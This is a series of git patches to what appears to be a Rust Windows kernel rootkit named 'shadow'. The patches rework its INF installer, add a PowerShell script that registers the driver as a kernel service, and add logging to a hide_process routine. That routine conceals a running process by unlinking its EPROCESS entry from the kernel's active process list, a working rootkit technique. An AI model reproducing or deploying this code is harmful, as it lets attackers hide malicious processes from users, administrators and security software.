From a2ed8c4bb2421222cad1d203f725a4b23257432c Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 15:36:05 -0800 Subject: [PATCH 01/12] Update shadow.inx --- driver/shadow.inx | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/driver/shadow.inx b/driver/shadow.inx index 328d813..612e5b7 100644 --- a/driver/shadow.inx +++ b/driver/shadow.inx @@ -5,7 +5,7 @@ [Version] Signature = "$WINDOWS NT$" Class = System ; TODO: specify appropriate Class -ClassGuid = {4d36e97d-e325-11ce-bfc1-08002be10318} ; TODO: specify appropriate ClassGuid +ClassGuid = {E7C2B7F0-3F3D-4EC8-B98A-123456789ABC} ; TODO: specify appropriate ClassGuid Provider = %ManufacturerName% CatalogFile = shadow.cat DriverVer = ; TODO: set DriverVer in stampinf property pages @@ -23,6 +23,9 @@ shadow.sys = 1,, ;***************************************** ; Install Section ;***************************************** +[DefaultInstall] +CopyFiles = File_Copy +AddService = shadow, 0x00000002, shadow_Service_Inst [Manufacturer] %ManufacturerName% = Standard,NT$ARCH$.10.0...16299 ; %13% support introduced in build 16299 From 377092376819b854225d9adf668826eb5789a206 Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 15:37:37 -0800 Subject: [PATCH 02/12] Update Cargo.toml --- driver/Cargo.toml | 1 + 1 file changed, 1 insertion(+) diff --git a/driver/Cargo.toml b/driver/Cargo.toml index f6a76c8..50d16eb 100644 --- a/driver/Cargo.toml +++ b/driver/Cargo.toml @@ -1,3 +1,4 @@ +[workspace] [package] name = "shadow" version = "0.1.0" From b02f30f6294ee02b53d8aa00d91e13a2e223348e Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 16:13:16 -0800 Subject: [PATCH 03/12] Update shadow.inx --- driver/shadow.inx | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/driver/shadow.inx b/driver/shadow.inx index 612e5b7..328d813 100644 --- a/driver/shadow.inx +++ b/driver/shadow.inx @@ -5,7 +5,7 @@ [Version] Signature = "$WINDOWS NT$" Class = System ; TODO: specify appropriate Class -ClassGuid = {E7C2B7F0-3F3D-4EC8-B98A-123456789ABC} ; TODO: specify appropriate ClassGuid +ClassGuid = {4d36e97d-e325-11ce-bfc1-08002be10318} ; TODO: specify appropriate ClassGuid Provider = %ManufacturerName% CatalogFile = shadow.cat DriverVer = ; TODO: set DriverVer in stampinf property pages @@ -23,9 +23,6 @@ shadow.sys = 1,, ;***************************************** ; Install Section ;***************************************** -[DefaultInstall] -CopyFiles = File_Copy -AddService = shadow, 0x00000002, shadow_Service_Inst [Manufacturer] %ManufacturerName% = Standard,NT$ARCH$.10.0...16299 ; %13% support introduced in build 16299 From 018b9ab124b3a0c83a9b4e771e4aab29566936e7 Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 16:31:35 -0800 Subject: [PATCH 04/12] Create install-driver.txt --- install-driver.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 install-driver.txt diff --git a/install-driver.txt b/install-driver.txt new file mode 100644 index 0000000..5afac04 --- /dev/null +++ b/install-driver.txt @@ -0,0 +1 @@ +rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 C:\path\to\shadow.inf From 59776fe857c6eaf89ed6e04a4b75c0f539af9dfa Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 16:35:23 -0800 Subject: [PATCH 05/12] Update install-driver.txt --- install-driver.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/install-driver.txt b/install-driver.txt index 5afac04..12a9566 100644 --- a/install-driver.txt +++ b/install-driver.txt @@ -1 +1 @@ -rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 C:\path\to\shadow.inf +rundll32.exe setupapi,InstallHinfSection DefaultInstall.NTamd64 132 C:\path\to\shadow.inf From 307a3e46ec762600f4d42fc126975106cb70da16 Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 16:44:28 -0800 Subject: [PATCH 06/12] Update shadow.inx --- driver/shadow.inx | 46 +++++++++++----------------------------------- 1 file changed, 11 insertions(+), 35 deletions(-) diff --git a/driver/shadow.inx b/driver/shadow.inx index 328d813..63c12a4 100644 --- a/driver/shadow.inx +++ b/driver/shadow.inx @@ -1,14 +1,12 @@ -; ; shadow.inf -; [Version] -Signature = "$WINDOWS NT$" -Class = System ; TODO: specify appropriate Class -ClassGuid = {4d36e97d-e325-11ce-bfc1-08002be10318} ; TODO: specify appropriate ClassGuid -Provider = %ManufacturerName% +Signature = "$WINDOWS NT$" +Class = System +ClassGuid = {4d36e97d-e325-11ce-bfc1-08002be10318} +Provider = %ManufacturerName% CatalogFile = shadow.cat -DriverVer = ; TODO: set DriverVer in stampinf property pages +DriverVer = 03/04/2025,16.12.53.325 PnpLockdown = 1 [DestinationDirs] @@ -18,29 +16,15 @@ DefaultDestDir = 13 1 = %DiskName%,,,"" [SourceDisksFiles] -shadow.sys = 1,, +shadow.sys = 1,, -;***************************************** -; Install Section -;***************************************** - -[Manufacturer] -%ManufacturerName% = Standard,NT$ARCH$.10.0...16299 ; %13% support introduced in build 16299 - -[Standard.NT$ARCH$.10.0...16299] -%shadow.DeviceDesc% = shadow_Device, Root\shadow ; TODO: edit hw-id - -[shadow_Device.NT] +[DefaultInstall.NTamd64] CopyFiles = File_Copy +AddService = shadow, 0x00000002, shadow_Service_Inst [File_Copy] shadow.sys -;-------------- Service installation -[shadow_Device.NT.Services] -AddService = shadow,%SPSVCINST_ASSOCSERVICE%, shadow_Service_Inst - -; -------------- shadow driver install sections [shadow_Service_Inst] DisplayName = %shadow.SVCDESC% ServiceType = 1 ; SERVICE_KERNEL_DRIVER @@ -48,15 +32,7 @@ StartType = 3 ; SERVICE_DEMAND_START ErrorControl = 1 ; SERVICE_ERROR_NORMAL ServiceBinary = %13%\shadow.sys -[shadow_Device.NT.Wdf] -KmdfService = shadow, shadow_wdfsect - -[shadow_wdfsect] -KmdfLibraryVersion = $KMDFVERSION$ - [Strings] -SPSVCINST_ASSOCSERVICE = 0x00000002 -ManufacturerName = "" ;TODO: Replace with your manufacturer name -DiskName = "shadow Installation Disk" -shadow.DeviceDesc = "shadow Device" -shadow.SVCDESC = "shadow Service" +ManufacturerName = "test" +DiskName = "shadow Installation Disk" +shadow.SVCDESC = "shadow Service" From 4cb53f4594ff8bcfd211d1c2a310a0842c343dbc Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Tue, 4 Mar 2025 16:46:09 -0800 Subject: [PATCH 07/12] Update and rename install-driver.txt to install-driver.ps1 --- install-driver.ps1 | 44 ++++++++++++++++++++++++++++++++++++++++++++ install-driver.txt | 1 - 2 files changed, 44 insertions(+), 1 deletion(-) create mode 100644 install-driver.ps1 delete mode 100644 install-driver.txt diff --git a/install-driver.ps1 b/install-driver.ps1 new file mode 100644 index 0000000..0d5f8ae --- /dev/null +++ b/install-driver.ps1 @@ -0,0 +1,44 @@ +# Ensure the script is running with administrative privileges. +if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) +{ + Write-Error "This script must be run as Administrator." + exit 1 +} + +# Set the path to your INF file (update this path as needed) +$InfPath = "C:\path\to\shadow.inf" +$InfFullPath = Resolve-Path $InfPath + +Write-Output "Installing INF from: $InfFullPath" + +# Construct and run the rundll32 command to install the INF using the DefaultInstall.NTamd64 section +$rundllCmd = "rundll32.exe setupapi,InstallHinfSection DefaultInstall.NTamd64 132 `"$InfFullPath`"" +Write-Output "Executing: $rundllCmd" +Invoke-Expression $rundllCmd + +# Pause briefly to allow the INF installation to complete +Start-Sleep -Seconds 5 + +# Search for the driver file (shadow.sys) in the DriverStore\FileRepository +$DriverStorePath = "C:\Windows\System32\DriverStore\FileRepository" +$shadowSys = Get-ChildItem -Path $DriverStorePath -Recurse -Filter "shadow.sys" -ErrorAction SilentlyContinue | Select-Object -First 1 + +if ($null -eq $shadowSys) { + Write-Error "shadow.sys not found in DriverStore\FileRepository." + exit 1 +} + +$DriverFilePath = $shadowSys.FullName +Write-Output "Driver file found at: $DriverFilePath" + +# Create the service using sc.exe +$ServiceName = "shadow" +# Wrap the path in quotes (note the backticks for proper escaping in the command line) +$binPath = "`"$DriverFilePath`"" +$scCommand = "sc.exe create $ServiceName type= kernel binPath= $binPath start= demand" +Write-Output "Executing: $scCommand" +Invoke-Expression $scCommand + +# Query the service to verify it was created +Write-Output "Querying service $ServiceName:" +sc.exe query $ServiceName diff --git a/install-driver.txt b/install-driver.txt deleted file mode 100644 index 12a9566..0000000 --- a/install-driver.txt +++ /dev/null @@ -1 +0,0 @@ -rundll32.exe setupapi,InstallHinfSection DefaultInstall.NTamd64 132 C:\path\to\shadow.inf From a6e1f6566163d13b0802b543dac767afdb5d0aeb Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Wed, 5 Mar 2025 14:12:12 -0800 Subject: [PATCH 08/12] Update install-driver.ps1 --- install-driver.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/install-driver.ps1 b/install-driver.ps1 index 0d5f8ae..38ebe6a 100644 --- a/install-driver.ps1 +++ b/install-driver.ps1 @@ -40,5 +40,5 @@ Write-Output "Executing: $scCommand" Invoke-Expression $scCommand # Query the service to verify it was created -Write-Output "Querying service $ServiceName:" +Write-Output "Querying service $ServiceName" sc.exe query $ServiceName From 8889e621452b6fc1b67f6d82f85298432436f86a Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Wed, 5 Mar 2025 16:04:07 -0800 Subject: [PATCH 09/12] Update Cargo.toml --- shadowx/Cargo.toml | 1 + 1 file changed, 1 insertion(+) diff --git a/shadowx/Cargo.toml b/shadowx/Cargo.toml index f25282b..6008baa 100644 --- a/shadowx/Cargo.toml +++ b/shadowx/Cargo.toml @@ -16,6 +16,7 @@ wdk-sys = "^0.3.0" wdk-alloc = "^0.3.0" spin = "0.9.8" obfstr = "0.4.4" +log = "0.4.22" bitfield = "0.17.0" ntapi = { version = "0.4.1", default-features = false } thiserror = { version = "2.0.10", default-features = false } From 1771b1e5acacd9ec78bceddaadf18fa9df1a41f4 Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Wed, 5 Mar 2025 16:13:03 -0800 Subject: [PATCH 10/12] Update error.rs --- shadowx/src/error.rs | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/shadowx/src/error.rs b/shadowx/src/error.rs index 6efbea6..ce7bfa7 100644 --- a/shadowx/src/error.rs +++ b/shadowx/src/error.rs @@ -145,6 +145,10 @@ pub enum ShadowError { /// This occurs when the system fails to remove a callback that was previously registered. #[error("Error removing a callback")] RemoveFailureCallback, + /// Represents an error when the process's active list entry is invalid, + /// such as when both the forward and backward pointers are null. + #[error("Invalid list entry encountered")] + InvalidListEntry, /// Error indicating that a failure occurred while restoring a callback. /// From 588af198dc0fa0cb114f5414cda1aa8a4c0b535c Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Wed, 5 Mar 2025 16:51:18 -0800 Subject: [PATCH 11/12] Update process.rs --- shadowx/src/process.rs | 47 ++++++++++++++++++++++++++++++++++-------- 1 file changed, 38 insertions(+), 9 deletions(-) diff --git a/shadowx/src/process.rs b/shadowx/src/process.rs index 0a744ac..fb0b363 100644 --- a/shadowx/src/process.rs +++ b/shadowx/src/process.rs @@ -103,42 +103,71 @@ impl Process { /// in the list before it was modified. /// * `Err(ShadowError)` - Returns an error if the process lookup fails or the operation encounters an issue. pub unsafe fn hide_process(pid: usize) -> Result { + // Log the start of the process hiding routine. + log::info!("Attempting to hide process with PID: {}", pid); + // Getting offsets based on the Windows build number let active_process_link = get_active_process_link_offset(); let offset_lock = get_process_lock(); // Retrieve the EPROCESS structure for the target process let process = Self::new(pid)?; + log::info!("Found EPROCESS for PID {} at address: {:p}", pid, process.e_process); - // Retrieve the `LIST_ENTRY` for the active process link, which connects the process - // to the list of active processes in the system. + // Retrieve the `LIST_ENTRY` for the active process link. let current = process.e_process.cast::().offset(active_process_link) as PLIST_ENTRY; - let push_lock = process.e_process.cast::().offset(offset_lock) as *mut u64; + log::info!("Current LIST_ENTRY pointer: {:p}", current); - // Use synchronization to ensure thread safety while modifying the list + // Retrieve the push lock for synchronization. + let push_lock = process.e_process.cast::().offset(offset_lock) as *mut u64; + log::info!("Using push lock at: {:p}", push_lock); + + // Use synchronization to ensure thread safety while modifying the list. with_push_lock_exclusive(push_lock, || { + log::info!("Acquired exclusive push lock for process hiding"); + // The next process in the chain let next = (*current).Flink; - // The previous process in the chain let previous = (*current).Blink; - + + log::info!( + "Before unlink: current->Flink = {:p}, current->Blink = {:p}", + (*current).Flink, (*current).Blink + ); + log::info!("Neighboring entries: next = {:p}, previous = {:p}", next, previous); + + // Check if the neighboring pointers are valid before proceeding + if next.is_null() || previous.is_null() { + log::error!("One or both of the neighboring pointers are null. Aborting unlink operation."); + return Err(ShadowError::InvalidListEntry); + } + // Storing the previous list entry, which will be returned let previous_link = LIST_ENTRY { Flink: next as *mut LIST_ENTRY, Blink: previous as *mut LIST_ENTRY, }; - + // Unlink the process from the active list (*next).Blink = previous; (*previous).Flink = next; - + log::info!("Unlinked process from active process list"); + // Make the current list entry point to itself to hide the process (*current).Flink = current; (*current).Blink = current; - + log::info!("Process LIST_ENTRY modified to point to itself"); + + // Log final state of the current entry + log::info!( + "Final state of current LIST_ENTRY: Flink = {:p}, Blink = {:p}", + (*current).Flink, (*current).Blink + ); + Ok(previous_link) }) + } /// Unhides a process by restoring it to the active process list in the operating system. From d1317c70bb08f7204bfb4f240b58292fb74c178b Mon Sep 17 00:00:00 2001 From: harryeetsource <95581121+harryeetsource@users.noreply.github.com> Date: Wed, 5 Mar 2025 16:51:58 -0800 Subject: [PATCH 12/12] Update install-driver.ps1 --- install-driver.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/install-driver.ps1 b/install-driver.ps1 index 38ebe6a..968c5a3 100644 --- a/install-driver.ps1 +++ b/install-driver.ps1 @@ -6,7 +6,7 @@ if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdent } # Set the path to your INF file (update this path as needed) -$InfPath = "C:\path\to\shadow.inf" +$InfPath = ".\driver\target\release\shadow_package\shadow.inf" $InfFullPath = Resolve-Path $InfPath Write-Output "Installing INF from: $InfFullPath"